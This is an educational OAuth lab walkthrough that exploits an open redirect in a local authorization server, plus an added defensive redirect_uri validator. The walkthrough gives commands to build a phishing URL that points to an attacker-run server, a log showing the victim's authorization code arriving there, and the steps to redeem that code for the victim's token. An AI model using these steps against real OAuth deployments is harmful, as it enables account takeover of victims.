This exercise exploits an open redirect vulnerability in the authorization server. The goal is to gain an access token that is tied to the victim's account.
```
$ git clone https://github.com/melonattacker/oauth-exploit-lab.git
$ cd oauth-exploit-lab/exercise/ex2
$ docker-compose up -d
```
| target | URL |
|---|---|
| client | http://localhost:10000 |
| crawler | http://localhost:10003 |
| username | password |
|---|---|
| bob (attacker) | hoge |
| tom (victim) | huga |
You can see that the verification of `redirect_uri` in the authorization server is insufficient: the check against the client's registered redirect URIs is commented out.

```python
# if request.args.get('redirect_uri') not in client['redirect_uris']:
#     print('Mismatched redirect URI, expected %s but got %s' % (client['redirect_uris'], request.args.get('redirect_uri')))
#     return render_template('error.html', error='Invalid redirect URI')
```
This makes it vulnerable to open redirect. To exploit it, an attacker goes through the authorization process under his own account, modifies the redirect URI to point at a server he controls, and then gets the victim to click the resulting link.
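For contrast, here is the check the lab's authorization server leaves commented out, written as a standalone function so its behaviour can be tested. This is an added example, not code from oauth-exploit-lab: the client registration and the registered callback URI `http://localhost:10000/callback` are assumptions constructed for illustration, and `authorize()` is a hypothetical stand-in for the real `/authorize` handler.

```python
# Added example (not part of oauth-exploit-lab): exact-match validation of
# redirect_uri against the client's registered URIs, i.e. the check the lab's
# authorization server has commented out.
from typing import Dict, List, Optional, Tuple

# Constructed client registration. The redirect URI is assumed; it is not
# taken from the lab's configuration.
CLIENTS: Dict[str, Dict[str, List[str]]] = {
    "oauth-client-1": {
        "redirect_uris": ["http://localhost:10000/callback"],
    },
}


def validate_redirect_uri(client_id: str, requested: Optional[str]) -> bool:
    """Return True only if `requested` is exactly one of the client's
    registered redirect URIs.

    Exact string comparison is deliberate: prefix, substring or wildcard
    matching would let a URI on a different host (or with a manipulated
    path) slip through, which is what sends the authorization code to a
    third party in the open-redirect scenario.
    """
    client = CLIENTS.get(client_id)
    if client is None or not requested:
        return False
    return requested in client["redirect_uris"]


def authorize(params: Dict[str, str]) -> Tuple[str, str]:
    """Hypothetical stand-in for the /authorize handler.

    Returns ('error', reason) or ('redirect', uri). On a mismatch the server
    must render an error page rather than redirect to the supplied URI,
    otherwise the check is bypassed by the very redirect it is meant to stop.
    """
    client_id = params.get("client_id", "")
    redirect_uri = params.get("redirect_uri")
    if client_id not in CLIENTS:
        return ("error", "Unknown client")
    if not validate_redirect_uri(client_id, redirect_uri):
        # Log the mismatch for detection; the expected list and the offending
        # value are what an analyst needs to spot a redirect manipulation.
        print("Mismatched redirect URI, expected %s but got %r"
              % (CLIENTS[client_id]["redirect_uris"], redirect_uri))
        return ("error", "Invalid redirect URI")
    return ("redirect", redirect_uri)


if __name__ == "__main__":
    # The registered URI is accepted; an attacker-controlled host is not.
    print(authorize({"client_id": "oauth-client-1",
                     "redirect_uri": "http://localhost:10000/callback"}))
    print(authorize({"client_id": "oauth-client-1",
                     "redirect_uri": "http://host.docker.internal:8080"}))
```

With this check in place the crafted URL from the walkthrough below is answered with an error page, so the code and state never leave the authorization server for an unregistered host.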
First, go through the authorization process and create a URL containing the modified redirect URI. To do that, you can use `exploit/create_url.py`.

```
$ python3 exploit/create_url.py
Fishing URL: http://auth_server:10001/authorize?response_type=code&client_id=oauth-client-1&redirect_uri=http%3A%2F%2Fhost.docker.internal%3A8080&state=5NFM0JRI0CGVSPTU6UXHVZNXSP0BANSD&scope=hoge+huga
```
Next, start an HTTP server on port 8080.

```
$ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
```
Then have the crawler (http://localhost:10003) visit the created URL.
When it's done, you'll see a response like this: the state and authorization code are sent to the attacker's server. You can also see the code and state in your server log.

```
127.0.0.1 - - [09/Sep/2022 00:19:25] "GET /?code=UDIGZLSL&state=5NFM0JRI0CGVSPTU6UXHVZNXSP0BANSD HTTP/1.1" 200 -
```
If you visit the link http://localhost:10000/callback?code=UDIGZLSL&state=5NFM0JRI0CGVSPTU6UXHVZNXSP0BANSD as the attacker (bob), you gain an access token. If you then click the Get Protected Resource button, you can see tom's resource.